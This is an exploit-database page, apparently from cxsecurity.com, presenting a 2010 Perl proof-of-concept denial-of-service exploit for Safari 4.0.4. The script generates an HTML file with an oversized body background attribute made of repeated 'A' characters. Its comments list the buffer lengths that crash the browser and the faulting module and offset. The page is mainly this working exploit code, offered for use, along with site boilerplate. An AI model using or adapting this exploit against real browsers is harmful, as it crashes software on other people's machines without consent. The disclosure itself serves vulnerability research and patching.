Safari 4.0.4 (531.21.10) - Stack Overflow/run

2010.03.07
Credit: John Cobb
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-Other

#!/usr/bin/perl # # Safari 4.0.4 (531.21.10) - Stack Overflow/run # 0Day DoS POC by John Cobb - www.NoBytes.com - 20/01/2010 - [v1.1] # Tested on WinXP (32bit) SP3 # # v1.1: # Extra Tags which also crash: # <img src = # <iframe src = # # Magic Numbers: # 114516 -> 114718 : Safari quits without error # 114719 : Safari quits with illegal operation: # AppName: safari.exe # AppVer: 5.31.21.10 # ModName: cfnetwork.dll # ModVer: 1.450.5.0 # Offset: 000567a7 $filename = $ARGV[0]; $buffer = $ARGV[1]; if(!defined($filename)) { print "Usage: $0 <filename.html> <buffer>\n\n"; } $header = "<html> <head>" . "\n"; $crash = "<body background = \"" . "A" x $buffer . "\">" . "\n"; $footer = "</html>" . "\n"; $data = $header . $crash . $footer; open(FILE, '>' . $filename); print FILE $data; close(FILE); exit;

References:

http://nobytes.com/exploits/Safari_4.0.4_background_DoS_pl.txt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top